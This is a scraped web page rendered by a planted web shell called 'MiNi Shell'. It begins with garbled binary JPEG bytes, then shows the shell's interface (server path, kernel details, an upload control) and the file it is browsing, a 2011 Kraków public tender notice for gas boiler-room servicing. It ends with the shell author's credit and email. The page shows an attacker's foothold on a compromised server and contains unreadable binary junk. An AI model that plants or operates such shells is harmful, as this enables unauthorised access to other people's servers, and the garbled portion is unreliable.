JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110217/57187-N-2011.html

<p class="kh_header"><b>Kraków: Prace serwisowe w kotłowniach gazowych  
placówek Dzielnic  XIV-XVIII Miasta Krakowa
obsługiwanych przez Zespół Ekonomiki Oświaty w Krakowie</b><br>
<b>Numer ogłoszenia: 57187 - 2011; data zamieszczenia: 17.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Ekonomiki Oświaty w Krakowie , ul. Ułanów 9, 31-450 Kraków, woj. małopolskie, tel. 012 4100215, 4188510, faks 012 4104390.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zeo.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prace serwisowe w kotłowniach gazowych  
placówek Dzielnic  XIV-XVIII Miasta Krakowa
obsługiwanych przez Zespół Ekonomiki Oświaty w Krakowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie usług serwisowych w kotłowniach gazowych placówek z Dzielnic XIV-XVIII Miasta Krakowa  obsługiwanych przez Zespół Ekonomiki Oświaty w Krakowie obejmujące:
bieżące prace serwisowe w kotłowniach związane z utrzymaniem w stałej gotowości do pracy i sprawności technicznej kotłów, urządzeń aparatury kontrolno-pomiarowej i automatyki oraz instalacji technologicznej kotłowni (w tym comiesięczne przeglądy eksploatacyjne kotłowni oraz  serwis awaryjny urządzeń i instalacji w kotłowniach),
jednorazowe roczne główne przeglądy serwisowe kotłów po zakończeniu sezonu grzewczego w okresie od. 01.04.2011r do 31.05.2011r.
W ramach comiesięcznego przeglądu eksploatacyjnego kotłowni Wykonawca zobowiązany będzie do:
sprawdzenia stanu ciśnienia wody w kotle/-ach i instalacji,
sprawdzenia stanu zaworów i rurociągów oraz wszystkich połączeń,
sprawdzenia działania przyrządów pomiarowych (manometry, termometry),
sprawdzenia odmulaczy i filtrów oraz ich czyszczenia,
sprawdzenia działania pomp obiegowych, zaworów odpowietrzających, zaworów regulacyjnych oraz ich nastaw, czujników temperatury w kotle/-ach, ograniczników ciśnienia i poziomu wody,
sprawdzenia stacji uzdatniania wody do uzupełnienia zładu,
sprawdzenia kompletności izolacji termicznej,
sprawdzenia programu na tablicy sterowniczej kotła/-ów oraz zgodności wskazań temperatury na termometrach i na pulpicie kotła/-ów,
sprawdzenia stanu odpowietrzenia instalacji,
wykonania kontroli przewodów doprowadzających powietrze do kotłowni.
Pełniąc serwis awaryjny urządzeń i instalacji w kotłowniach Wykonawca winien podjąć interwencję w celu usunięcia awarii w ciągu 3 godzin od chwili otrzymania od Zamawiającego lub placówki pisemnej lub telefonicznej informacji o awarii .
Bieżące prace serwisowe w kotłowniach Wykonawca zobowiązany będzie pełnić:
dla kotłowni, w których zainstalowane są kotły c.w.u lub  c.o+c.w.u - w całym okresie obowiązywania umowy na realizację przedmiotowego zamówienia (planowany okres: 10 m-cy; 1.03.2011r. - 31.12.2011r)
dla kotłowni, w których zainstalowane są wyłącznie kotły c.o. -  w okresie krótszym niż cały okres obowiązywania umowy na realizację przedmiotowego zamówienia z wyłączeniem m-cy V, VI, VII, VIII 2011r. (planowany okres: 6 m-cy)
W ramach rocznego głównego przeglądu serwisowego kotła Wykonawca zobowiązany będzie do:
czyszczenia powierzchni ogrzewalnej kotła,
czyszczenia palnika,
sprawdzenia i ewentualnej wymiany wkładek filtrów,
sprawdzenia elektrody zapłonowej oraz jakości iskry, ewentualnej regulacji lub wymiany elektrody,
sprawdzenia urządzeń kontroli płomienia- elektrody jonizacyjnej lub fotokomórki,
sprawdzenia nastaw czujników oraz ich funkcjonowania,
sprawdzenie urządzeń sterujących i regulujących, ich funkcji, nastawy oraz czasu zadziałania,
sprawdzenia położenia głowicy palnika,
oględzin zdemontowanego palnika kotła, sprawdzenie izolacji ceramicznych, a w przypadku wystąpienia uszkodzeń wymiany elementów niesprawnych,
oczyszczenia okienka podglądu płomienia, wentylatora i klapy powietrza,
ustawienia wszystkich współpracujących części palnika zgodnie z instrukcją,
sprawdzenia procesu spalania oraz składu chemicznego spalin w zakresie temperatury spalin, zawartości tlenku węgla, dwutlenku węgla, tlenu oraz tlenków azotu  w spalinach,  a także  sprawdzenia temperatury pomieszczeń kotłowni (z uwagi na temperaturę powietrza, które weźmie udział w procesie spalania),   sprawdzenia sprawności paleniskowej i  pomiaru ciśnienia gazu,
ustalenia zakresu regulacji palnika na podstawie pomiaru składu spalin
sprawdzenia podciśnienia w komorze spalania,
czyszczenia zewnętrznego palnika,
sprawdzenia szczelności ścieżki gazowej po zakończeniu czynności czyszczenia i montażu palnika,
sprawdzenia urządzeń gazometrycznych występujących w kotłowni,
Dodatkowo wykonawca podczas świadczenia usług serwisowych kotłowni każdej z placówek zobowiązany będzie  do:
wykonywania wszystkich czynności zgodnie obowiązującymi uregulowaniami prawnymi, normami i zasadami w zakresie techniki grzewczej i instalacyjnej oraz bezpieczeństwa i higieny pracy,
utrzymywania należytego porządku w pomieszczeniach kotłowni,
prowadzenia dziennika kotłowni i zapisywania w nim wszelkich uwag dotyczących pracy kotłowni ,
sporządzenia protokołów z wykonanych przez siebie prac (tj. protokół z wykonanego comiesięcznego przeglądu eksploatacyjnego, protokół z wykonanego przeglądu głównego) oraz dostarczenia ich Zamawiającemu w terminie 2 dni od daty zakończenia prac w nich ujętych,
sporządzenia po zakończeniu przeglądu głównego kotła/-ów w kotłowni pisemnego wykazu prac niezbędnych do wykonania lub mających na celu poprawę sprawności  i efektywności działania kotłowni i przedstawienia go Zamawiającemu e terminie 2 dni od daty zakończenia przeglądu,
uczestniczenia w wymaganych kontrolach Urzędu Dozoru Technicznego.
	W przypadku, gdy podczas pełnienia przez Wykonawcę usług serwisowych w kotłowniach konieczne będzie zainstalowanie części zamiennych, ich wartość pokrywa Zamawiający po uprzednim przedstawieniu mu przez Wykonawcę dowodu ich zakupu (faktura, rachunek). Jeżeli przedstawiona przez Wykonawcę wartość zainstalowanej części jest wyższa od jej przeciętnej  ceny ustalonej wg SEKONCENBUD, Zamawiający pokrywa wydatek na zakup danej części tylko do wysokości ceny wynikającej z SEKONCENBUD-u. 
Liczba kotłowni: 14.
Liczba kotłów: 21.
Zamawiający zastrzega sobie możliwość zmiany na etapie realizacji zamówienia ilości podlegających obsłudze kotłowni i kotłów a także zmiany rodzajów kotłów (np. na skutek likwidacji kotłowni czy kotła lub wymiany  zainstalowanych w kotłowniach kotłów na inne). Z tego tytułu Wykonawcy w stosunku do Zamawiającego nie będą przysługiwać żadne dodatkowe roszczenia (w tym roszczenia finansowe). Wykonawca otrzyma wyłącznie wynagrodzenie za usługi rzeczywiście świadczone w ramach serwisowania kotłowni..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.53.10.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien dysponować do realizacji zamówienia co najmniej jedną osobą uprawnioną do wykonywania pomiarów wchodzących w zakres przedmiotowy zamówienia tj. osobą posiadającą aktualne uprawnienia do eksploatacji urządzeń i instalacji w zakresie obsługi, konserwacji, prac montażowych i kontrolno-pomiarowych oraz automatyki kotłowni wodnych opalanych paliwem gazowym o mocy do 500 KW.
Zamawiający dokona oceny spełnienia tego warunku metodą 0-1, tj. spełnia lub nie spełnia, na podstawie oświadczeń  składanych przez Wykonawców</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>III.6.1. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt III.4.3.1) zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
III.6.2) Dotyczy sytuacji, gdy Wykonawca będzie polegać na zasobach innych podmiotów:
Dokument/-y udowadniający/-e, że Wykonawca będzie dysponował zasobami innych podmiotów niezbednymi do realizacji zamówienia  - w szczególności pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na  na okres korzystania z  nich przy wykonaniu zamówienia.
III.6.3) Pełnomocnictwo - do reprezentowania Wykonawcy w postępowaniu albo do reprezentowania Wykonawcy w postępowaniu i zawarcia umowy, jeżeli Wykonawca ustanowił pełnomocnika w ww. zakresie.
III.6.4) Wypełniony i podpisany przez Wykonawcę formularz ofertowy  zawierający:
Nazwę (firmę) albo imię i nazwisko Wykonawcy,
Siedzibę (firmy) albo adres zamieszkania i adres (zakładu) Wykonawcy,
Numer NIP (nieobligatoryjnie),
Dane kontaktowe: nr telefonu, nr faksu (nieobligatoryjnie)
Nazwę zadania stanowiącego przedmiot oferty,
Wynagrodzenie  brutto (z VAT)  za :
a) bieżące prace serwisowe w jednej kotłowni w okresie jednego miesiąca,
b) przegląd główny serwisowy jednego kotła,
 części zamówienia, które Wykonawca zamierza powierzyć podwykonawcom (jeżeli dotyczy)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Określono w SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zeo.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Ekonomiki Oświaty w Krakowie, ul. Ułanów 9, Kraków - pok. 50.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.02.2011 godzina 10:00, miejsce: Zespół Ekonomiki Oświaty w Krakowie, ul. Ułanów 9, Kraków -dziennik podawczy/sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> IV.4.16.1) Uzupełnienie pkt. II.2) Termin realizacji zadania: od dnia 1.03.2011 do dnia 31.12.2011r., a jeżeli podpisanie umowy nastąpi w terminie późniejszym  niż 1.03.2011r.- od dnia podpisania umowy do dnia 31.12.2011r. 
IV.4.16.2) Uzupełnienie pkt. IV.4.1) Specyfikację istotnych warunków zamówienia (SIWZ) można odebrać w Zespole Ekonomiki Oświaty w Krakowie, ul. Ułanów 9, pokój nr 50 w poniedziałki. w godz. 10:00 -15:00, w pozostałe dni robocze (z wyjątkiem czwartków ) w godz. 10.00-14.00 -(koszt materiałów: 7,- zł, w tym VAT). W celu odebrania SIWZ niezbędne będzie podanie Zamawiającemu numeru NIP Wykonawcy. SIWZ dostępna jest także na stronie internetowej Zamawiającego www.zeo.krakow.pl. Ww. uzupełnienie nie dotyczy pobierania SIWZ ze strony internetowej Zamawiającego. 
IV.4.16.3) Inne informacje uzupełniające: Pracownicy upoważnieni do kontaktów z Wykonawcami:  Aleksandra Kostrzewa.
Zamawiający nie zamierza zawierać umowy ramowej.
Zamawiający nie zamierza ustanawiać dynamicznego systemu zakupów.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com